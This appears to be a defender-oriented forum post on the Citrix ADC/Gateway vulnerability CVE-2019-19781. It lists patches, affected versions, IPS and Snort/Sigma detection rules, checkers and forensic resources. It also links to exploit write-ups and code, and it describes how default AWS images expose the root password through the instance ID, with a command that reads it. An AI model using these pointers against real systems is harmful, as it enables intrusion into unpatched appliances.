[https://www.cyber.gov.au/threats/advisory-2020-001-active-exploitation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway](https://www.cyber.gov.au/threats/advisory-2020-001-active-exploitation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway) * [https://medium.com/@hungrybytes/mitigation-steps-for-cve-2019-19781-8f88d48770b4](https://medium.com/@hungrybytes/mitigation-steps-for-cve-2019-19781-8f88d48770b4) * Palo Alto content version 8224 or newer. * 8224 contains detection code for this CVE and will reset the connection before the vulnerability can be exploited. Resets are visible in the threat logs with a name of "Citrix Application Delivery Controller And Gateway Directory Traversal Vulnerability". * Fortinet IPS 15.754 has a signature - default action is 'pass' though * [https://fortiguard.com/encyclopedia/ips/48653](https://fortiguard.com/encyclopedia/ips/48653) * from the comments by [u/ragogumi](https://www.reddit.com/u/ragogumi/) * "*Fortinet IPS sig appears to be ineffective at detecting or mitigating. I've seen nothing in IPS logs related to this CVE - and cisagov checker, nessus scans and 3rd party red team attempts have not trigger IPS sensor, regardless of remediation state.*" * Checkpoint released IPS protection too, 2020-01-12, "Citrix Multiple Products Directory Traversal (CVE-2019-19781)". Default action seems to be "Detect". * [https://www.checkpoint.com/defense/advisories/public/2019/CPAI-2019-1653.html](https://www.checkpoint.com/defense/advisories/public/2019/CPAI-2019-1653.html) **Details on how to exploit** * [https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/](https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/) * [https://github.com/jas502n/CVE-2019-19781](https://github.com/jas502n/CVE-2019-19781) **Checkers** * [https://github.com/cisagov/check-cve-2019-19781](https://github.com/cisagov/check-cve-2019-19781) (USA Government) * [https://github.com/mekoko/CVE-2019-19781](https://github.com/mekoko/CVE-2019-19781) (Chinese) * [https://github.com/hackingyseguridad/nmap/blob/master/CVE-2019-19781.nse](https://github.com/hackingyseguridad/nmap/blob/master/CVE-2019-19781.nse) (nmap script) * [https://github.com/cyberstruggle/DeltaGroup/blob/master/CVE-2019-19781/CVE-2019-19781.nse](https://github.com/cyberstruggle/DeltaGroup/blob/master/CVE-2019-19781/CVE-2019-19781.nse) (nmap script) * [https://github.com/lasersharkkiller/scripts/blob/master/exploits/scanner/cve-2019-19781-scanner.ps1](https://github.com/lasersharkkiller/scripts/blob/master/exploits/scanner/cve-2019-19781-scanner.ps1) (PowerShell) *

Multiple Exploits for CVE-2019-19781 (Citrix ADC/Netscaler) released overnight - prepare for mass exploitation ***Last update:*** January 20 - 07:01 UTC/GMT **Patches Now Out for Some** Updates to 11.1 (11.1 63.15) and 12.0 (12.0 63.13) are now up Citrix blog post: [Vulnerability Update: First permanent fixes available, timeline accelerated](https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/?mkt_tok=eyJpIjoiT1RVME56UXhOak00WWpnMyIsInQiOiI0NG9GcjY4Z09OS3ZKT3BcL21odWp6V25EcmdFR3lwMVNBWmhqTjlpR1hmbzlRSlhIXC9BSXJyK0NNMk9SdEdFMkw4cUl5Mk9MVnBkY1JxSGJLZithVjh3PT0ifQ%3D%3D) ADC version 12.0: [https://www.citrix.com/downloads/citrix-adc/firmware/release-120-build-6313.html](https://www.citrix.com/downloads/citrix-adc/firmware/release-120-build-6313.html) ADC version 11.1: [https://www.citrix.com/downloads/citrix-adc/firmware/release-111-build-6315.html](https://www.citrix.com/downloads/citrix-adc/firmware/release-111-build-6315.html) **Important** Citrix issued revised updates today * [https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/](https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/) Fox-IT issued an analysis * [https://resources.fox-it.com/rs/170-CAK-271/images/Fox-IT%20Advisory%20on%20Citrix%20vulnerability.pdf](https://resources.fox-it.com/rs/170-CAK-271/images/Fox-IT%20Advisory%20on%20Citrix%20vulnerability.pdf) **Impact / Root Cause** remote pre-auth arbitrary command execution due to logic vuln i.e. reliable execution possible. **Products affected** * Citrix ADC and Citrix Gateway version 13.0 all supported builds * Citrix ADC and NetScaler Gateway version 12.1 all supported builds * Citrix ADC and NetScaler Gateway version 12.0 all supported builds * Citrix ADC and NetScaler Gateway version 11.1 all supported builds * Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds ***Amazon Web Services*** *-* [https://twitter.com/KevTheHermit/status/1216318333219491840](https://twitter.com/KevTheHermit/status/1216318333219491840) At midday on January 12th Citrix Netscaler AMIs on AWS are default vulnerable out of the box. The root password is set to the instance ID; that can be read from the metadata URL. You can also "cat /flash/nsconfig/.AWS/instance-id". **Background on the vulnerability** * [https://nvd.nist.gov/vuln/detail/CVE-2019-19781](https://nvd.nist.gov/vuln/detail/CVE-2019-19781) * [https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/](https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/) **Sigma rules** * [https://github.com/Neo23x0/sigma/blob/master/rules/web/web\_citrix\_cve\_2019\_19781\_exploit.yml](https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml) **Snort rules** * [https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/) **Snort/Suricata rules** * Present since December 29th - 2029206 - ET EXPLOIT Possible Citrix Application Delivery Controller Arbitrary Code Execution Attempt (CVE-2019-19781) (exploit.rules) in the EmergingThreats * [https://rules.emergingthreats.net/open/](https://rules.emergingthreats.net/open/) **Exploitation Forensic Artifacts** * [https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/](https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/?utm_content=112033384&utm_medium=social&utm_source=twitter&hss_channel=tw-403811306) * [https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/) *